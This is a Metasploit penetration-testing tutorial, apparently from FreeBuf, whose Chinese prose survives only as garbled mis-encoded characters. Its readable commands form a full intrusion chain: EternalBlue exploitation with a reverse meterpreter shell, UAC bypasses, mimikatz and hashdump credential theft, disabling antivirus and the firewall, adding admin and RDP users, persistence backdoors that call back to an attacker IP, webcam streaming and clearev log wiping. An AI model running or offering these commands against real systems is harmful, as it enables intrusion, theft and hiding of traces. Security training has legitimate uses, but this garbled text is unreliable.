±à¼ÍƼö: |
±¾ÎÄÀ´×ÔÓÚ
FreeBuf,±¾ÎÄÖ÷Òª½éÉÜÁËÔÚÉøÍ¸²âÊÔÖУ¬ÈçºÎʹÓÃÆµÂʽ϶àµÄMSFÃüÁʹMSFÖеĹ¥»÷Ä£¿é½øÐЩ¶´¹¥»÷£¬Ï£Íû¶ÔÄúµÄѧϰÓÐËù°ïÖú¡£ |
|

ÔÚÉøÍ¸¹ý³ÌÖУ¬MSF©¶´ÀûÓÃÉñÆ÷ÊDz»¿É»òȱµÄ¡£¸üºÎ¿öËüÊÇÒ»¸öÃâ·ÑµÄ¡¢¿ÉÏÂÔØµÄ¿ò¼Ü£¬Í¨¹ýËü¿ÉÒÔºÜÈÝÒ׵ػñÈ¡¡¢¿ª·¢²¢¶Ô¼ÆËã»úÈí¼þ©¶´ÊµÊ©¹¥»÷¡£Ëü±¾Éí¸½´øÊý°Ù¸öÒÑÖªÈí¼þ©¶´µÄרҵ¼¶Â©¶´¹¥»÷¹¤¾ß¡£ÊÇÐÅÏ¢ÊÕ¼¯¡¢Â©¶´É¨Ã衢ȨÏÞÌáÉý¡¢ÄÚÍøÉøÍ¸µÈ¼¯³ÉµÄ¹¤¾ß¡£
ǰ²»¾ÃMSF´Ó4.7Éý¼¶µ½MSF5.0,ÆäÖиĽøÁËÊý¾Ý¿âµÄ´¦ÀíÂß¼£¬ÓÅ»¯ÁËmsfconsoleÖն˲Ù×÷£¬²¢½«PostgreSQL×÷Ϊһ¸öRESTful·þÎñµ¥¶ÀÔËÐС£´ËÍ⻹¼ÓÈëÒ»¸öWeb·þÎñ¿ò¼Ü£¬ÐµÄÃâɱģ¿é£¬ÓÅ»¯ÁË¿ØÖƹ¦Äܵȡ£
ÏÂÃæÐ¡°××ܽáÁËÒ»ÏÂÔÚÉøÍ¸²âÊÔÖУ¬Ê¹ÓÃÆµÂʽ϶àµÄMSFÃüÁ·ÖΪÒÔϼ¸¿éÀ´½²¡£

ÐÅÏ¢ÊÕ¼¯
·¢ÏÖÄ¿±êÍø¶ÎµÄ´æ»îÖ÷»ú:
ÎÒÃÇ¿ÉÒÔÀûÓÃauxiliaryÕâ¸öÄ£¿éÀ´»ñȡĿ±êÍø¶ËµÄÐÅÏ¢£¬°üÀ¨¶Ë¿Ú¿ª·ÅÇé¿ö¡¢Ö÷»ú´æ»îÇé¿ö¡£
auxiliary/scanner/discovery/arp_sweep
auxiliary/scancer/smb/smb_version ´æ»îµÄ445Ö÷»ú
auxiliary/scanner/portscan/syn ¶Ë¿ÚɨÃè
auxiliary/scanner/telnet/telnet_version telent·þÎñɨÃè
auxiliary/scanner/rdp/rdp_scanner Ô¶³Ì×ÀÃæ·þÎñɨÃè
auxiliary/scanner/ssh/ssh_version sshÖ÷»úɨÃè
¡£¡£¡£¡£¡£¡£

ͼƬһɨÃèÄ£¿éÐÅÏ¢
Ò»°ãÇé¿öÏÂÎÒÃÇÔÚÉøÍ¸²âÊÔµÄʱºò£¬Èç¹ûÔÚ²»ÖªµÀ×ʲúµÄÇé¿öÏ£¬ÎÒÃÇ»á°ÑÕû¸öÍø¶Ë½øÐÐɨÃè´æ»îÖ÷»ú£¬È»ºóÔÙ¶Ô´æ»îµÄÐÅÏ¢ÊÕ¼¯ÐÅÏ¢£¬ÕâÑùµÄ»°¾Í¿ÉÒÔËõ¶ÌÎÒÃǵÄÉøÍ¸²âÊÔʱ¼ä£¬¶ø²»Ã¤Ä¿µÄÈ¥²âÊÔ£¬ÓÐʱºòäĿÐÅÏ¢ÊÕ¼¯»áµ¼ÖºóÆÚÉøÍ¸µÄµÀ·¶¼ÊÇÍäµÄ£¬´ï²»µ½Ô¤ÆÚµÄЧ¹û¡£
²»¹ÜÊǶ˿ÚɨÃ軹ÊÇ̽²â´æ»îÖ÷»ú£¬¶¼ÊÇÒªÉèÖÃÄ¿±êIPµØÖ·set rhosts ipµØÖ·£¬Èç¹ûɨÃèÕû¸öÍø¶ÎµÄ»°£¬×îºóÉèÖÃÒ»ÏÂỊ̈߳ºset
thread Ïß³ÌÊý(¸ù¾ÝÇé¿öÉèÖÃ)¡£

Ö´ÐÐrunÃüÁʼɨÃèÍø¶ÎµÄ´æ»îÖ÷»ú£¬·¢ÏÖÓÐ7̨·þÎñÆ÷´æ»î£¬ÕâÑùµÄ»°ÎÒÃǾͿÉÒÔ¶ÔÕâЩ´æ»îÖ÷»ú½øÐÐÏÂÒ»²½µÄÐÅÏ¢ÊÕ¼¯£¬±ÈÈç22¡¢445¡¢3389µÈÃô¸Ð¶Ë¿Ú¿ª·ÅÇé¿ö̽²â£¬ÔÚÕâÀïÐèҪ˵Ã÷һϣ¬ÒÔС°×µÄÉøÍ¸²âÊÔ¾Ñ飬һ°ãÎÒÏȲ»É¨ÃèÕû¸öÍø¶Ë£¬ÒòΪÕâÑù¶ÔÄ¿±êÖ÷»úÓÐËðºÄ£¬¿ÉÒÔÖ±½ÓɨÃèÓÐÒç³ö©¶´µÄ¸ßΣ¶Ë¿Ú£¬Èç¹ûÓеϰ£¬ÄÇô¾Í¿ÉÒÔͨ¹ýÒç³ö½øÐÐÌáȨ£¬ÕâÑùµÄ·½·¨Ò²ÊÇÒ»Öֽݾ¶¡£Ïà·´µÄÇé¿öÏ£¬Èç¹ûÈ«¶Ë¿ÚɨÃèµÄ»°¸öÈ˽¨ÒéÓÃnmap¹¤¾ß¡£

ÏÂÃæÎÒÃÇ̽²âÒ»ÏÂÍø¶ÎÖпªÆô445¶Ë¿ÚµÄÖ÷»ú£¬Í¨¹ýɨÃè·¢ÏÖÍø¶ÎÖÐÓÐ3̨Ö÷»ú¿ªÆôÁË445¶Ë¿Ú£¬ÕâÑùµÄ»°ÎÒÃǾͿÉÒÔÔÚºóÆÚµÄ©¶´Ì½²âÖвâÊÔÊÇ·ñ´æÔÚÓÀºãÖ®À¶Â©¶´¡£
Use auxiliary/scanner/smb/smb_version
Set rhosts 192.168.201.1/24 //ÉèÖÃÄ¿±êÖ÷»úµØÖ·
Set threads 30 //ÉèÖÃɨÃèÏß³Ì
Run //Ö´ÐÐɨÃèÃüÁî


ǰÆÚÆäËüµÄ¶Ë¿ÚɨÃèµÄÃüÁî¶¼ÊDz¶àµÄ£¬ÏÂÃæÎÒÃǽéÉÜһϱ¬ÆÆµÄÄ£¿é£¬ÔÚkaliÖÐÓÐ×Ô¼ºÄÚÖõÄÃÜÂë±¾£¬µ±È»ÄãÒ²¿ÉÒÔÓÃ×Ô¼ºµÄ×ֵ䡣Äã¿´¶à·½±ã£¬ÏëÓþÍÓ㬲»ÓþͲ»Óá£
ÄÚÖÃÃÜÂë±íµÄµØÖ·£º
/usr/share/wordlists/metasploit/

Ò»°ã±¬ÆÆµÄ»°ÎÒÃÇ¿ÉÒÔ¶Ôssh¡¢mysql¡¢sql¡¢Oracle¡¢vnc¡¢telnetµÈ³£ÓõĶ˿Ú
auxiliary/scanner/mysql/mysql_login
auxiliary/scanner/mssql/mssql_login
auxiliary/scanner/ssh/ssh_login
¡£¡£¡£¡£¡£¡£ |
©¶´Ì½²â
½ÓÏÂÀ´ÎÒÃÇͨ¹ýǰÆÚµÄÐÅÏ¢ÊÕ¼¯£¬¿ÉÒԵõ½Ä¿±êÖ÷»úÖÐÓÐÈý̨Ö÷»ú¿ªÆôÁË445¶Ë¿Ú£¬ÎÒÃÇ¿ÉÒÔ½øÒ»²½Ì½²âÊDz»ÊÇ´æÔÚÓÀºãÖ®À¶Â©¶´¡£ÎÒÃÇ¿ÉÒÔÓÃÒÔÏÂÃüÁîÀ´Ì½²âһϣº
ÔÚ֮ǰ×öÅàѵµÄʱºò£¬±¾µØ´î½¨²âÊÔ»·¾³·¢ÏÖ2008 R2µÄ·þÎñÆ÷©¶´ÑéÖ¤µÄʱºò¾ÍÖ±½ÓÀ¶ÆÁ£¬¾ßÌåÔÒò²»Çå¡£ËùÒÔ´ó¼ÒÔÚÉøÍ¸²âÊԵĹý³ÌÖÐÒ»¶¨ÒªºÏÀíµÄÆÀ¹À©¶´µÄ¿ÉÓÃÐÔ¡£Í¨¹ýɨÃè·¢ÏÖÓÐһ̨Ŀ±êÖ÷»ú´æÔÚÓÀºãÖ®À¶Â©¶´¡£Æäʵ³ýÁËÓÀºãÖ®À¶£¬Ò²ÓÐÐí¶àÆäËüµÄÒç³ö©¶´£¬ÔÚÕâÀï¾Í²»Ò»Ò»Ïê½âÁË£¬ÔÀí¶¼Ò»Ñù¡£
use auxiliary/scanner/smb/smb_ms17_010
//ʹÓÃÓÀºãÖ®À¶Ì½²âÄ£¿é
how options ²é¿´ÐèÒªÌí¼ÓµÄÐÅÏ¢
set rhosts 192.168.205.1/24 //ÉèÖÃɨÃèÄ¿±êÖ÷»úIPµØÖ·
set threads 30 //ÉèÖÃɨÃèÏß³Ì
Run //¿ªÆôɨÃè |


©¶´ÀûÓÃ
ͨ¹ý©¶´Ì½²â½×¶ÎÎÒÃÇ·¢ÏÖ192.168.205.150Õą̂Ŀ±êÖ÷»ú´æÔÚÓÀºãÖ®À¶Â©¶´£¬ÄÇÎÒÃÇ¿ÉÒÔʹÓÃMSFÖеĹ¥»÷Ä£¿é½øÐЩ¶´¹¥»÷£¬¿´¿´Äܲ»ÄÜ»ñÈ¡µ½Ä¿±êÖ÷»úµÄwebshell£¬ÕâÑùµÄ»°£¬ÎÒÃǾͿÉÒÔͨ¹ýÒç³ö©¶´À´¸ãÄÚÍøµÄºáÏòɨÃè¡£Ö´ÐÐÒÔÏÂÃüÁ
use exploit/windows/smb/ms17_010_eternalblue
//ʹÓÃÓÀºãÖ®À¶¹¥»÷Ä£¿é
set payload windows/meterpreter/reverse_tcp //ÉèÖÃÒ»¸öPayload£¬Ê¹¹¥»÷»ú½ÓÊÜÀ´×ÔÄ¿±êÖ÷»úµÄsession
set rhosts 192.168.205.150 //ÉèÖÃÄ¿±êÖ÷»úµØÖ·
set lhost 192.168.205.148 //ÉèÖýÓÊÜpayloadµÄµØÖ·£¬ÎÒÃÇÕâÀïÉèÖÃMSFµÄµØÖ·
set LPORT 5555 // ÉèÖýÓÊܵĶ˿ڣ¬Õâ¸ö×Ô¼º×Ô¶¨Ò壬ֻҪ²»ÓëÆäËü¶Ë¿Ú³åÍ»¾Í¿ÉÒÔ
Exploit //Ö´Ðй¥»÷ÃüÁî |


ȨÏÞÌáÉý
µ±ÎÒÃǵõ½Ò»¸öÄ¿±êÖ÷»ú·µ»ØµÄshellºó£¬ÎÒÃǵÚÒ»²½Òª¿´µÄÊǵ±Ç°Óû§ÊDz»ÊǹÜÀíԱȨÏÞ£¬Èç¹û²»ÊǹÜÀíԱȨÏÞ£¬Õâ¸öʱºòÐèÒªÎÒÃÇÈ¥ÌáȨ¡£ÎÒÃÇ¿ÉÒÔÀûÓÃkailiÖеı¾µØÌáȨµÄ·½Ê½£¬ÏÂÃæ½éÉÜһϱ¾µØÌáÈ¨ÈÆ¹ýUACµÄ·½Ê½ÌáÉýµ±Ç°Óû§È¨ÏÞ£¬ÒÔÏÂÊÇÏêϸµÄÃüÁîÒÔ¼°²½Ö裺
ÎÒÃÇÊ×ÏȽéÉÜÒ»ÏÂÕâ¸öUACµ½µ×ÊÇʲô¶«¶«£¬ÊÇÔõôÔËÐеģ¿
1.ʲôÊÇUAC£¿
MicrosoftµÄWindows VistaºÍWindows Server 2008²Ù×÷ϵͳÒýÈëÁËÒ»ÖÖÁ¼ºÃµÄÓû§ÕÊ»§¿ØÖƼܹ¹£¬ÒÔ·Àֹϵͳ·¶Î§ÄÚµÄÒâÍâ¸ü¸Ä£¬ÕâÖÖ¸ü¸ÄÊÇ¿ÉÒÔÔ¤¼ûµÄ£¬²¢ÇÒÖ»ÐèÒªºÜÉٵIJÙ×÷Á¿¡£ËüÊÇWindowsµÄÒ»¸ö°²È«¹¦ÄÜ£¬ËüÖ§³Ö·ÀÖ¹¶Ô²Ù×÷ϵͳ½øÐÐδ¾ÊÚȨµÄÐ޸ģ¬UACÈ·±£½öÔÚ¹ÜÀíÔ±ÊÚȨµÄÇé¿öϽøÐÐijЩ¸ü¸Ä¡£Èç¹û¹ÜÀíÔ±²»ÔÊÐí¸ü¸Ä£¬Ôò²»»áÖ´ÐÐÕâЩ¸ü¸Ä£¬²¢ÇÒWindowsϵͳ±£³Ö²»±ä¡£
2.UACÈçºÎÔËÐУ¿
UACͨ¹ý×èÖ¹³ÌÐòÖ´ÐÐÈκÎÉæ¼°ÓйØÏµÍ³¸ü¸Ä/ÌØ¶¨ÈÎÎñµÄÈÎÎñÀ´ÔËÐС£³ý·Ç³¢ÊÔÖ´ÐÐÕâЩ²Ù×÷µÄ½ø³ÌÒÔ¹ÜÀíԱȨÏÞÔËÐУ¬·ñÔòÕâЩ²Ù×÷½«ÎÞ·¨ÔËÐС£Èç¹ûÄúÒÔ¹ÜÀíÔ±Éí·ÝÔËÐгÌÐò£¬ÔòËü½«¾ßÓиü¶àȨÏÞ£¬ÒòΪËü½«±»¡°ÌáÉýȨÏÞ¡±£¬¶ø²»ÊÇÒÔ¹ÜÀíÔ±Éí·ÝÔËÐеijÌÐò¡£
ÒòΪÓеÄÓû§ÊÇûÓйÜÀíԱȨÏÞ£¬Ã»ÓйÜÀíԱȨÏÞÊÇÔËÐв»ÁËÄÄЩֻÄÜͨ¹ý¹ÜÀíԱȨÏÞ²ÅÄܲÙ×÷µÄÃüÁî¡£±ÈÈçÐÞ¸Ä×¢²á±íÐÅÏ¢¡¢´´½¨Óû§¡¢¶ÁÈ¡¹ÜÀíÔ±ÕË»§ÃÜÂë¡¢ÉèÖüƻ®ÈÎÎñÌí¼Óµ½¿ª»úÆô¶¯ÏîµÈ²Ù×÷¡£
×îÖ±½ÓµÄÌáȨÃüÁgetsystem
ÈÆ¹ýUAC·À»¤»úÖÆµÄǰÌáÊÇÎÒÃÇÊ×ÏÈͨ¹ýexplloit»ñµÃÄ¿±êÖ÷»úµÄmeterprter¡£»ñµÃmeterpreter»á»°1ºó£¬ÊäÈëÒÔÏÂÃüÁîÒÔ¼ì²éÊÇ·ñÊÇsystemȨÏÞ¡£ÔÚÕâÀïÎҾͲ»Ö±½ÓÑÝʾÁË£¬Ö±½ÓÉÏÃüÁ×Ô¼º¶àÁ·Ï°Á·Ï°¼´¿É£¬Ëù»°ËµÊìÄÜÉúÇÉ¡£ÎÒÃÇÐèÒª°Ñ»ñÈ¡µ½µÄsession±£´æµ½ºǫ́£¬Ö´ÐÐbackground

·½·¨Ò»:
use exploit/windows/local/bypassuac //½«Í¨¹ý½ø³Ì×¢ÈëʹÓÿÉÐÅÈη¢²¼ÕßÖ¤ÊéÈÆ¹ýWindows
UAC¡£Ëü½«Éú³É¹Ø±ÕUAC±êÖ¾µÄµÚ¶þ¸öshell¡£
set session 1 //ʹÓÃsessino 1
Exploit //Ö´ÐÐȨÏÞÌáÉýµÄ¹¥»÷ģʽ
Ö´ÐÐÍê±Ï³É¹¦ºó£¬Ôٴβéѯµ±Ç°Óû§µÄȨÏ޾ͻáÌáÉýµ½¹ÜÀíԱȨÏÞ¡£ÎÒÕâÀïÒѾÊǹÜÀíԱȨÏÞÁË£¬ËùÒÔ»á³öÏÖÕâÑùµÄÌáʾ¡£


·½·¨¶þ£ºWindowsȨÏÞÌáÉýÈÆ¹ýUAC±£»¤£¨ÄÚ´æ×¢È룩
´ËÄ£¿é½«Í¨¹ý½ø³Ì×¢ÈëʹÓÿÉÐÅÈεķ¢²¼ÕßÖ¤ÊéÈÆ¹ýWindows UAC¡£Ëü½«Éú³É¹Ø±ÕUAC±êÖ¾µÄµÚ¶þ¸öshell¡£ÔÚÆÕͨ¼¼ÊõÖУ¬¸ÃÄ£¿éʹÓ÷´ÉäʽDLL×¢Èë¼¼Êõ²¢Ö»³ýÈ¥ÁËDLL
payload ¶þ½øÖÆÎļþ£¬¶ø²»ÊÇÈý¸öµ¥¶ÀµÄ¶þ½øÖÆÎļþ¡£µ«ÊÇ£¬ËüÐèҪѡÔñÕýÈ·µÄÌåϵ¼Ü¹¹£¨¶ÔÓÚSYSWOW64ϵͳҲʹÓÃx64£©¡£Ö´ÐÐÍê±ÏÒÔÏÂÃüÁµ±Ç°Óû§È¨Ï޾ͻá±äΪ¹ÜÀíԱȨÏÞ¡£
use exploit/windows/local/bypassuac_fodhelper
set session
1Exploit |
·½·¨Èý£ºÍ¨¹ýCOM´¦Àí³ÌÐò½Ù³Ö
Ê×ÏȽéÉÜÒ»ÏÂÕâ¸öCOM´¦Àí³ÌÐò½Ù³Ö£¬´ËÄ£¿é½«Í¨¹ýÔÚhkcuÅäÖõ¥ÔªÖд´½¨COM´¦Àí³ÌÐò×¢²á±íÏîÀ´ÈƹýWindows
UAC¡£µ±¼ÓÔØÄ³Ð©½Ï¸ßÍêÕûÐÔ¼¶±ð½ø³Ìʱ£¬»áÒýÓÃÕâЩע²á±íÏ´Ó¶øµ¼Ö½ø³Ì¼ÓÔØÓû§¿ØÖƵÄDLL¡£ÕâЩDLL°üº¬µ¼Ö»ỰȨÏÞÌáÉýµÄpayload¡£´ËÄ£¿éÐÞ¸Ä×¢²á±íÏµ«ÔÚµ÷ÓÃpayloadºó½«Çå³ý¸ÃÏî¡£Õâ¸öÄ£¿éÐèÒªpayloadµÄÌåϵ¼Ü¹¹ºÍ²Ù×÷ϵͳƥÅ䣬µ«Êǵ±Ç°µÄµÍȨÏÞmeterpreter»á»°Ìåϵ¼Ü¹¹ÖпÉÄܲ»Í¬¡£Èç¹ûÖ¸¶¨exe:£ºcustom£¬ÔòÓ¦ÔÚµ¥¶ÀµÄ½ø³ÌÖÐÆô¶¯payloaºóµ÷ÓÃExitProcess£¨£©¡£´ËÄ£¿éͨ¹ýÄ¿±êÉϵÄcmd.exeµ÷ÓÃÄ¿±ê¶þ½øÖÆÎļþ¡£Òò´Ë£¬Èç¹ûcmd.exe·ÃÎÊÊܵ½ÏÞÖÆ£¬´ËÄ£¿é½«ÎÞ·¨Õý³£ÔËÐС£
ÃüÁîÖ´ÐУº
use exploit/windows/local/bypassuac_comhijack
set session
1Exploit |
·½·¨ËÄ£ºÍ¨¹ýEventvwr×¢²á±íÏî
Ê×ÏȽéÉÜÒ»ÏÂÕâ¸öÄ£¿é£¬´ËÄ£¿é½«Í¨¹ýÔÚµ±Ç°Óû§ÅäÖõ¥ÔªÏ½ٳÖ×¢²á±íÖеÄÌØÊâ¼ü²¢²åÈ뽫ÔÚÆô¶¯Windowsʼþ²é¿´Æ÷ʱµ÷ÓõÄ×Ô¶¨ÒåÃüÁîÀ´ÈƹýWindows
UAC¡£Ëü½«Éú³É¹Ø±ÕUAC±êÖ¾µÄµÚ¶þ¸öshell¡£´ËÄ£¿éÐÞ¸Ä×¢²á±íÏµ«ÔÚµ÷ÓÃpayloadºó½«Çå³ý¸ÃÏî¡£¸ÃÄ£¿é²»ÐèÒªpayloadµÄÌåϵ¼Ü¹¹ºÍ²Ù×÷ϵͳƥÅä¡£Èç¹ûÖ¸¶¨EXE
::Custom£¬ÔòÓ¦ÔÚµ¥¶ÀµÄ½ø³ÌÖÐÆô¶¯payloadºóµ÷ÓÃExitProcess£¨£©¡£
use exploit/windows/local/bypassuac_eventvwr
set session
1Exploit |
ÒÔÉϵı¾µØÌáȨµÄÄ£¿é´ó¼Ò¿ÉÒÔ±¾µØÈ¥²âÊÔһϣ¬³ýÁËÕâЩij¿é»¹ÓÐÆäËüµÄͨ¹ýÖ±½Óͨ¹ýincognitoÖеÄaddlocalgroupuserÌáÉý¡¢ms13-081¡¢ms15-051¡¢ms16-032¡¢MS16-016¡¢MS14-068¡¢ms188120win32k_privescÓòȨÏÞÌáÉýµÈÆäËüµÄȨÏÞÌáÉý·½·¨¡£Ð¡°×ÔÚÄÚÍøÉøÍ¸²âÊԵĹý³ÌÖз¢ÏÖһЩ¿Í»§µÄ·þÎñÆ÷´ó¶àÊýΪ2003¡¢2008·þÎñÆ÷£¬ºÜÉÙ2012¡¢2016·þÎñÆ÷¡£
ÄÚÍøÉøÍ¸
¼ÈȻĿ±êÖ÷»úshellÒ²·´µ¯ÁË£¬Óû§È¨ÏÞ´ÓµÍȨÏÞÒ²ÌáÉýµ½Á˹ÜÀíԱȨÏÞ£¬ÄÇô½ÓÏÂÀ´¾ÍÊÇÎÒÃǽøÐÐÄÚÍøÉøÍ¸µÄʱºòÁË£¬ÄÚÍøÉøÍ¸Éæ¼°µÄÃæ±È½Ï¹ã£¬ÔÚÕâÒ»½ÚÒ²»áÏêϸµÄÊáÀíһϳ£ÓõÄÃüÁî¡£

cat //²é¿´ÎļþÄÚÈÝ
Getwd //²é¿´µ±Ç°¹¤×÷Ŀ¼
Download //ÏÂÔØÎļþµ½±¾µØ |

±¾µØ´´½¨Ò»¸ö1.txt,½«1.txtÉÏ´«µ½Ä¿±ê·þÎñÆ÷µÄ×ÀÃæÎ»Öãº
Upload /opt/1.txt Ä¿±êÖ÷»ú

ÎÒÃÇÔÚÄ¿±êÖ÷»úÉÏÃæ´´½¨Ò»¸öpass.txt,ÄÚÈÝΪhello hack!!!!,ÔÚMSFÉÏÖ´ÐÐdownloadÏÂÔØÃüÁ½«pass.txtÏÂÔØµ½¹¥»÷»úÉÏÃæ¡£

ÃüÁî¸ñʽ£ºDownload Ä¿±êÖ÷»úÎļþ ±¾µØÎļþ·¾¶

Ipconfig/ifoncig
//²é¿´Ä¿±êÖ÷»úIPµØÖ·£»
arp ¨Ca //ÓÃÓڲ鿴¸ßËÙ»º´æÖеÄËùÓÐÏîÄ¿£»
route //´òӡ·ÓÉÐÅÏ¢£»
netstat -na //¿ÉÒÔÏÔʾËùÓÐÁ¬½ÓµÄ¶Ë¿Ú |
Rdesktop //ʹÓÃrdesktopÀ´Á¬½Ó -u Óû§Ãû -p ÃÜÂë,Õâ¸öÃüÁîÐèÒªÔÚkaliÉÏÃæ°²×°Ò»Ï¡£µ±ÎÒÃÇ»ñÈ¡µ½¹ÜÀíÔ±Õ˺ÅÃÜÂëµÄʱºò¾Í¿ÉÒÔÖ±½Ó±¾µØÔ¶³ÌµÇ½Ŀ±êÖ÷»ú¡£
¡¡.


ÆäÖзÓÉÐÅÏ¢¶ÔÓÚÉøÍ¸ÕßÀ´ËµÌØÓÐÓã¬ÒòΪ¹¥»÷»ú´¦ÓÚÍâÍø£¬Ä¿±êÖ÷»ú´¦ÓÚÄÚÍø£¬ËûÃÇÖ®¼äÊDz»ÄÜͨÐŵ쬹ÊÐèÒªÌí¼Ó·ÓÉÀ´°Ñ¹¥»÷»úµÄIPÌí¼Óµ½ÄÚÍøÀïÃæ£¬ÕâÑùÎÒÃǾͿÉÒÔºáɨÄÚÍø£¬¾ÍÊÇËùνµÄÄÚÍø´úÀí¡£
Ê×ÏÈÎÒÃÇÐèÒª»ñÈ¡Íø¶Î£¬È»ºóÔÙÌí¼Ó·ÓÉ£¬Ìí¼Ó³É¹¦ºó¾Í¿ÉÒÔºáÏòɨÃèÄÚÍøÖ÷»ú¡£
run get_local_subnets
//»ñÈ¡Íø¶Î
run autoroute -s 192.168.205.1/24 //Ìí¼Ó·ÓÉ
run autoroute -p //²é¿´Â·ÓÉ
run autoroute -d -s 172.2.175.0 //ɾ³ýÍø¶Î
run post/windows/gather/arp_scanner RHOSTS=7.7.7.0/24
//̽²â¸ÃÍø¶ÎϵĴæ»îÖ÷»ú¡£
meterpreter > background //ºǫ́sessions |
ϵͳÐÅÏ¢:
Ps //²é¿´Ä¿±êÖ÷»úµÄ½ø³ÌÐÅÏ¢
Kill //ɱµôij¸ö½ø³Ì
Getuid //²é¿´È¨ÏÞ
Pwd ²é¿´µ±Ç°Ä¿Â¼Â·¾¶(Ä¿±êÖ÷»ú)
Sysinfo //²é¿´Ä¿±êÖ÷»úÐÅÏ¢£¬±ÈÈç°æ±¾ÐÅÏ¢µÈ
Shutdown //¹Ø»ú²Ù×÷(½÷É÷²Ù×÷) |

PostÄ£¿éÐÅÏ¢,Õâ¸öÓõıȽ϶࣬±ÈÈç¼ì²éÄ¿±êϵͳÊDz»ÊÇÐé»ú¡¢°²×°ÁËÄÄЩÈí¼þ¡¢²¹¶¡ÐÅÏ¢µÈ¡£ÆäʵÕâ¸öÄ£¿é²»½öÏÞÓÚÕâЩģ¿é£¬ÓÐÐËȤµÄ´óÀпÉÒÔÈ¥ÍæÒ»Íæ¡£
Run post/windows/gather/checkvm
//²é¿´Ä¿±êÖ÷»úÊÇ·ñΪÐé»ú£»
run post/windows/gather/enum_applications //»ñȡĿ±êÖ÷»ú°²×°Èí¼þÐÅÏ¢£»
Run post/windows/gather/enum_patches //²é¿´Ä¿±êÖ÷»úµÄ²¹¶¡ÐÅÏ¢£»
run post/windows/gather/enum_domain //²éÕÒÄ¿±êÖ÷»úÓò¿Ø¡£ÎÒ±¾µØÃ»ÓÐÓò¿Ø£»
run post/windows/manage/killav //¹Ø±Õɱ¶¾Èí¼þ£»
run post/windows/manage/enable_rdp //¿ªÆô3389Ô¶³Ì×ÀÃæ£»
run post/windows/gather/enum_logged_on_users //Áоٵ±Ç°µÇ½¹ýÖ÷»úµÄÓû§£»
run post/windows/gather/credentials/windows_autologin
//ץȡ×Ô¶¯µÇ½µÄÓû§ÃûºÍÃÜÂ룻
run post/windows/manage/enable_rdp username=xxx
password=xxx //Ìí¼ÓÔ¶³Ì×ÀÃæµÄÓû§(ͬʱҲ»á½«¸ÃÓû§Ìí¼Óµ½¹ÜÀíÔ±×é) |


LoadÃüÁîÊǼÓÔØÄ£¿éµÄ£¬ÔÚ²âÊÔÖÐÓõÄ×î¶àµÄ¾ÍÊÇץȡÓû§ÃÜÂëµÄÕâ¸öÄ£¿é¡£
load mimikatz
//¼ÓÔØmimikatz£¬ÓÃÓÚץȡÃÜÂ룬²»ÏÞÓÚÃ÷ÎÄÃÜÂëºÍhashÖµ£»
Run hashdump //»ñÈ¡Óû§ÃÜÂëhashÖµ
msv //»ñÈ¡µÄÊÇhashÖµ
Ssp //»ñÈ¡µÄÊÇÃ÷ÎÄÐÅÏ¢
wdigest //¶ÁÈ¡ÄÚ´æÖдæ·ÅµÄÕ˺ÅÃÜÂëÃ÷ÎÄÐÅÏ¢
mimikatz_command -f samdump::hashes //»ñÈ¡Óû§hash
mimikatz_command -f handle::list //ÁгöÓ¦Óýø³Ì
mimikatz_command -f service::list //Áгö·þÎñ |


ºóÃų־û¯
ȨÏÞά³Ö
PersistenceÄ£¿é
ÎÒÃÇÏÈ¿´Ò»ÏÂPersistenceÄ£¿éÐÅÏ¢£º
Run persistence
-h //²é¿´°ïÖúÐÅÏ¢£»
run persistence -U -i 5 -p 5555 -r 192.168.205.148
|
-U£ºÉèÖúóÃÅÔÚÓû§µÇ¼ºó×ÔÆô¶¯¡£¸Ã·½Ê½»áÔÚHKCU\Software\Microsoft\Windows\CurrentVersion\RunÏÂÌí¼Ó×¢²á±íÐÅÏ¢¡£ÍƼöʹÓøòÎÊý£»
-i£ºÉèÖ÷´ÏòÁ¬½Ó¼ä¸ôʱ¼ä£¬µ¥Î»ÎªÃ룻
-p£ºÉèÖ÷´ÏòÁ¬½ÓµÄ¶Ë¿ÚºÅ£»
-r£ºÉèÖ÷´ÏòÁ¬½ÓµÄipµØÖ·¡£

Metsvc Ä£¿é£º
Õâ¸öÄ£¿éʹÓ÷dz£¼òµ¥£¬ÎÒÃÇÊ×ÏÈ¿´Ò»ÏÂÕâ¸öÄ£¿éµÄÐÅÏ¢:

Ö±½ÓÔËÐÐrun metsvc£¬ÃüÁîÖ´ÐÐÍê±ÏºóÔÚÄ¿±êÖ÷»úÉÏÃæ¾Í»áÓÐÒ»¸ömeterpreterÕâ¸ö·þÎñ£¬ÀàÐÍΪ×Ô¶¯Æô¶¯¡£
¿ªÆôÁíÒ»¸ö¿Í»§¶ËÓÃhanderϵļàÌýÄ£¿é£¬ÖØÐ»ñÈ¡shell£¬ÕâÀïµÄ¼àÌýµÄ¶Ë¿ÚΪ31337


ºÛ¼£Çå³ý
ÔÚÉøÍ¸ÈëÇֵĹý³ÌÖÐÄÑÃâ»áÁôÏÂÒ»ÏÂÈÕÖ¾ÐÅÏ¢ºÛ¼££¬ÎÒÃÇ¿ÉÒÔʹÓôËÃüÁîÀ´²Á³ýÁôϵĺۼ££º
clearevÕâ¸öÃüÁîÊÇ×îÖ±½ÓµÄɾ³ýÈÕÖ¾µÄÃüÁî¡£
ÔËÐÐÃüÁîºóÄ¿±êÖ÷»úÉÏÃæµÄÈÕÖ¾»áÈ«²¿É¾³ý¡£

²¹³äÆäËü
³ýÁËÉÏÊöµÄÍ⣬ÏÂÃæÔÚ»ã×ÜһЩÆäËüµÄ²Ù×÷ÃüÁî
Run getgui -e
//¿ªÆôÔ¶³Ì×ÀÃæ£»
Run getgui -u cmdback -p 123123 //Ìí¼ÓÓû§
Run getgui -f 4446 -e //½«Ä¿±êÖ÷»úÉÏÃæµÄ3389¶Ë¿Úת·¢µ½4446
netsh advfirewall set allprofiles state off //¹Ø±Õ·À»ðǽ
Webscan_list //²é¿´ÉãÏñÍ·ÁÐ±í£»
Webscan_stream //ÉãÏñÍ·ÊÓÆµ»ñÈ¡£»
Webscan_chat //²é¿´ÉãÏñÍ·½Ó¿Ú£»
steal_token ÊÔͼÇÔȡָ¶¨£¨PID£©½ø³ÌµÄÁîÅÆ
use incognito //¼ÓÔØincoginto¹¦ÄÜ£¨ÓÃÀ´µÁÇÔÄ¿±êÖ÷»úµÄÁîÅÆ»òÊǼÙðÓû§)
list_tokens ¨Cu //ÁгöÄ¿±êÖ÷»úÓû§µÄ¿ÉÓÃÁîÅÆ
list_tokens ¨Cg //ÁгöÄ¿±êÖ÷»úÓû§×éµÄ¿ÉÓÃÁîÅÆ
